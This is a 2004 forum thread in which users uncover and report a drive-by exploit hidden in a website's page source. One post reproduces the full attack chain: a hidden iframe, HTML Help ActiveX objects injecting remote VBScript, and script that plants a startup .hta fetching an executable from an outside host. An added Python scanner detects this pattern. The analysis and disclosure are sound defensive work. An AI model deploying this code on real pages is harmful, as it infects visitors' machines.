#76083 - 12/27/04 01:23 PM lukeisback
Bornyo Offline
Porn Jesus

Registered: 09/23/04
Posts: 10321
Can someone else with computer knowledge hit www.lukeisback.com and see if something there brings up a slew of security warnings? I'm thinking that one of his advertisers has nazi infiltrators.

It's trying to replace a file called c:\windows\system\hhctrl.ocx

I know this is off-topic for the cage, but since we're all fascinated with his site, and know he reads the cage, maybe he can get it fixed. (I didn't let lukeisback replace any files on my computer.)

#76084 - 12/27/04 02:09 PM Re: lukeisback
Ivor Biggun Offline
Kurt Lackwood's Fluffer

Registered: 10/09/04
Posts: 1176
Quote:

Can someone else with computer knowledge hit www.lukeisback.com and see if something there brings up a slew of security warnings? I'm thinking that one of his advertisers has nazi infiltrators.

It's trying to replace a file called c:\windows\system\hhctrl.ocx

I know this is off-topic for the cage, but since we're all fascinated with his site, and know he reads the cage, maybe he can get it fixed. (I didn't let lukeisback replace any files on my computer.)

hhctrl.ocx is the HTML Help ActiveX Control. Like most ActiveX controls it has its legitimate uses, but the whole ActiveX system is a security nightmare, relying on code being downloaded from "trustworthy" sites (thanks, Microsoft).

I didn't get the warning because I use Firefox, which purposefully ignores the whole ActiveX mess. I haven't missed it.

A quick dig through the source of Luke's site reveals this line at the very end to be the offender:

<iframe src="http://www.outdoornewswire.com/iesploit/spatch.htm" frameborder=0 width=0 height=0 marginwidth=0 marginheight=0 scrolling=no></iframe>

Which references this code hosted on outdoornewswire.com:

<OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>

<OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"vbscript\\\" src=\\\"http://www.outdoornewswire.com/iesploit/writehta.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>

<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>

which references this VBScript code hosted in the text file writehta.txt on outdoornewswire.com:

on error resume next
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.outdoornewswire.com;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs = CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
rs.close
conn.close

I don't know enough to figure out exactly what it all does, but I don't like the look of it.
_________________________
"If I were a guy, not swallowing would be a deal breaker. So what if you cook and clean? I can get a maid for that." - Gia Jordan
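
As an added example, not code from the thread or from either site, the following Python scanner looks for the three pieces Ivor pulled out of the page source: a zero-size iframe pulling in a third-party page, an HTML Help (hhctrl.ocx) OBJECT whose Related Topics item points at a file:, javascript: or vbscript: target instead of help content, and a script that fires the control with HHClick(). The CLSID is the one quoted in the OBJECT tags above; the sample page is constructed for the example and uses a placeholder host in place of the real one.

```python
"""Detect the hidden-iframe / HTML Help control drive-by pattern in HTML source.

Added example: finds (1) iframes with zero width and height, (2) OBJECT tags for
the HTML Help control whose ItemN parameters point at file:, javascript: or
vbscript: targets, and (3) inline script that triggers them with HHClick().
"""
import re
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control, as quoted in the OBJECT tags in the thread.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
# Schemes a "command;<target>" item should never use on a normal help page.
DANGEROUS_SCHEME = re.compile(r"^\s*(javascript|vbscript|file):", re.IGNORECASE)


def _is_zero(value):
    """True for 0, 0px or 0% (the dimensions used to hide an iframe)."""
    if value is None:
        return False
    m = re.match(r"^\s*(\d+(?:\.\d+)?)\s*(px|%)?\s*$", value)
    return m is not None and float(m.group(1)) == 0


class DriveByScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []      # list of (kind, detail) tuples
        self._object = None     # ItemN values of the hhctrl OBJECT we are inside
        self._script = None     # buffered text of the <script> we are inside

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases names already
        if tag == "iframe" and _is_zero(a.get("width")) and _is_zero(a.get("height")):
            self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "object":
            if (HHCTRL_CLSID in a.get("classid", "").lower()
                    or "hhctrl.ocx" in a.get("codebase", "").lower()):
                self._object = {"id": a.get("id", "?"), "items": []}
        elif tag == "param" and self._object is not None:
            if a.get("name", "").lower().startswith("item"):
                self._object["items"].append(a.get("value", ""))
        elif tag == "script":
            self._script = []

    def handle_endtag(self, tag):
        if tag == "object" and self._object is not None:
            obj, self._object = self._object, None
            for item in obj["items"]:
                # Related Topics items look like "command;<target>". A target in a
                # local or scripting scheme is the abuse pattern, not help content.
                cmd, _, target = item.partition(";")
                if cmd.strip().lower() == "command" and DANGEROUS_SCHEME.match(target):
                    self.findings.append(("hhctrl-command", f'{obj["id"]}: {target[:60]}'))
        elif tag == "script" and self._script is not None:
            text, self._script = "".join(self._script), None
            if re.search(r"\.HHClick\s*\(", text):
                self.findings.append(("hhclick-trigger", text.strip()[:60]))

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)


def scan_html(html):
    """Return the list of (kind, detail) findings for one page."""
    parser = DriveByScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample modelled on the snippet quoted in the thread (placeholder host).
SAMPLE_PAGE = """
<html><body><p>Normal content.</p>
<iframe src="http://badhost.example/iesploit/spatch.htm" frameborder=0 width=0 height=0 scrolling=no></iframe>
<OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Item1" value="command;file://C:\\WINDOWS\\some\\local\\page.htm">
</OBJECT>
<OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Item1" value='command;javascript:execScript("document.write(...)")'>
</OBJECT>
<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind:16} {detail}")
```

Run against saved page source rather than a live fetch; the point is to spot the pattern in a page you already have, without an ActiveX-enabled browser rendering it.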

#76085 - 12/27/04 03:01 PM Re: lukeisback
Ivor Biggun Offline
Kurt Lackwood's Fluffer

Registered: 10/09/04
Posts: 1176
UPDATE: THIS IS DEFINITELY MALICIOUS CODE!!!!!

I visited lukeisback.com using IE, expecting to see warnings like Bornyo, but didn't get any - just a meaningless pop-up. I then found that it had created the file:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta

.hta files are HTML Applications. This one downloads a file from http://www.outdoornewswire.com/iesploit/sysprog.exe and saves it as C:\calc.exe. Thankfully, I spotted this before I rebooted my system and gave it a chance to run.

The frightening thing is that I'm running a fully patched, up to date Win XP SP2. This appears to be an unpatched exploit in the wild.

I found a write-up on the vulnerability here. Looks like someone took this "proof of concept" and adapted it for malicious purposes.

Everyone, check your system for these:

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta
C:\calc.exe

If they exist, DELETE THEM. Virus checkers might not pick up something so new.

I'm emailing Luke and outdoornewswire.com to let them know they're own3d.
_________________________
"If I were a guy, not swallowing would be a deal breaker. So what if you cook and clean? I can get a maid for that." - Gia Jordan

#76086 - 12/27/04 03:20 PM Re: lukeisback
Bornyo Offline
Porn Jesus

Registered: 09/23/04
Posts: 10321
Thanks for the info Ivor. I guess the only reason my computer caught it is because that was my office system, still on Win98 with all settings on paranoid. I will point out that calc.exe is also the filename of the little Windows calculator program, but it shouldn't normally be located in the root of "C:\".

Anyway, I apologize to Garfield and Killttboy for posting something so far above their heads, but since Luke is getting all his updates through this forum lately I figured this was the quickest way to get the word to him.
Thanks again.

#76087 - 12/27/04 03:42 PM Re: lukeisback
Ivor Biggun Offline
Kurt Lackwood's Fluffer

Registered: 10/09/04
Posts: 1176
Quote:

Thanks for the info Ivor. I guess the only reason my computer caught it is because that was my office system, still on Win98 with all settings on paranoid. I will point out that calc.exe is also the filename of the little Windows calculator program, but it shouldn't normally be located in the root of "C:\".

Indeed, the vulnerability report stated that this had not been tested in Win98. It probably relies on newer features to work.

Quote:

since Luke is getting all his updates through this forum lately I figured this was the quickest way to get the word to him.

Luke responded immediately to my email; he's already pulled the offending html code line from his site.
_________________________
"If I were a guy, not swallowing would be a deal breaker. So what if you cook and clean? I can get a maid for that." - Gia Jordan

#76088 - 12/27/04 03:53 PM Re: lukeisback
Bornyo Offline
Porn Jesus

Registered: 09/23/04
Posts: 10321
Quote:

Luke responded immediately to my email; he's already pulled the offending html code line from his site.

Once again, the Proprietors of this site and our enabler Smelly Monkey, with the help of a loyal user, Ivor, save Luke from mucho embarrassment, and the porno world at large from a very dangerous virus.

How many folks at ADT are talking about this?

#76089 - 12/27/04 05:09 PM Re: lukeisback
JRV Offline
Porn Jesus

Registered: 08/03/03
Posts: 5849
Loc: TX, USA
Excellent analysis Ivor. I haven't used Win9x in several years, but I think this would try to infect but fail. It's aimed at NT - NT4, NT5/Windows 2000 or NT5.1 Windows XP.
_________________________
"If they can't picture me with a knife, forcing them to strip in an alley, I don't want any part of it. It's humiliating." - windsock

#76090 - 12/27/04 06:06 PM Re: lukeisback
Lurid2.0 Offline
Max Hardcore Prison Bitch

Registered: 10/07/04
Posts: 308
Loc: los chaos, CA
Quote:

Once again, the Proprietors of this site and our enabler Smelly Monkey

this is just what i'm talking about, bornyo, stop ur embarrassing yourself. monkey kisses luke ford's ass and you suck up to smelly monkey. everything is cyclical & I'm only trying to help.

_________________________
banished from the cage!

#76091 - 12/27/04 07:54 PM Re: lukeisback
Bornyo Offline
Porn Jesus

Registered: 09/23/04
Posts: 10321
Luke fixed it and gave top billing to Ivor. Apparently he WAS "own3d". Thanks again to Ivor, you sussed it out. www.lukeisback.com

Proprietors, notice the dis he gave you in his quote: he de-capped the "P". It wasn't proper English but was meant as a sign of respect.
